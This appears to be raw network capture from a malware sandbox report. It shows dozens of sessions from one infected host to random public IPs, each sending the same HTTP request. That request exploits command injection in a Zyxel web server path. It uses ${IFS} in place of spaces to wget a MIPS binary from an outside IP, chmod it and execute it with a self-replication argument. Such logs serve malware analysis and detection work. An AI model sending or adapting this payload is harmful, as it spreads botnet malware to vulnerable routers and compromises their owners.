                                    Jan 13, 2024 19:02:19.845133066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    700192.168.2.1343978148.60.240.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845159054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    701192.168.2.1358580120.246.211.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845184088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    702192.168.2.1356164105.73.123.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845225096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    703192.168.2.1337902101.71.111.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845247030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    704192.168.2.136053853.33.78.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845289946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    705192.168.2.1359196223.253.160.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845333099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    706192.168.2.1339738107.231.242.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845355988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    707192.168.2.1349032116.116.175.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845413923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    708192.168.2.135455412.154.25.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845421076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    709192.168.2.133563436.236.98.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845453024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    710192.168.2.1351058175.117.116.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845508099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    711192.168.2.1337872163.74.6.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845535040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    712192.168.2.135498641.91.248.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845573902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    713192.168.2.1343912107.214.175.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845613003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    714192.168.2.1345502205.168.123.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845643997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    715192.168.2.133639845.218.101.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845705032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    716192.168.2.1360920174.143.251.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845763922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    717192.168.2.1348620162.224.42.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845783949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    718192.168.2.134539478.60.85.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845818996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    719192.168.2.1333426216.194.50.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845824957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    720192.168.2.135205674.49.6.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845854044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    721192.168.2.134141035.164.105.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845910072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    722192.168.2.133844653.135.116.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845936060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    723192.168.2.1344304178.82.17.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845963001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    724192.168.2.1360104154.44.138.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.845997095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    725192.168.2.135598890.45.151.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846062899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    726192.168.2.1334130221.225.39.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846095085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    727192.168.2.1348418164.58.181.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846122026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    728192.168.2.134296614.90.82.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846148014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    729192.168.2.1354706151.73.113.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846189022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    730192.168.2.1338766198.84.171.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846240997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    731192.168.2.1336892223.193.38.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846266985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    732192.168.2.1355362180.139.26.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846285105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    733192.168.2.1333390135.38.15.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846329927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    734192.168.2.1345946197.248.113.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846371889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    735192.168.2.1356086161.25.38.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846395016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    736192.168.2.1351966122.20.188.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846434116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    737192.168.2.1336162135.100.245.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846468925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    738192.168.2.136024834.39.240.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846509933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    739192.168.2.133661450.164.121.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846538067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    740192.168.2.1334240213.119.109.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846580029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    741192.168.2.1338010210.131.62.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846612930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    742192.168.2.1354724222.180.12.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846638918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    743192.168.2.1334360143.157.209.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846689939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    744192.168.2.1337716163.149.225.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846733093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    745192.168.2.1359070218.245.158.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846740007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    746192.168.2.134382647.145.223.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846796036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    747192.168.2.1360178100.3.236.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846839905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    748192.168.2.1348708178.134.235.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846856117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    749192.168.2.134940688.58.27.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846879959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    750192.168.2.135568435.218.91.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846913099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    751192.168.2.1345448121.238.33.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.846963882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    752192.168.2.133820088.224.51.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847006083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    753192.168.2.1333566205.237.24.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847033024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    754192.168.2.1343102137.8.240.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847070932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    755192.168.2.135261062.183.46.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847124100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    756192.168.2.1333686134.150.137.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847142935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    757192.168.2.1347200119.228.221.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847181082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    758192.168.2.1339948193.132.35.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847223997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    759192.168.2.134433665.218.101.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847249031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    760192.168.2.1358312157.112.42.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847285032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    761192.168.2.1359446142.23.164.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847337961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    762192.168.2.133283465.214.67.156443
                                    TimestampBytes transferredDirectionData
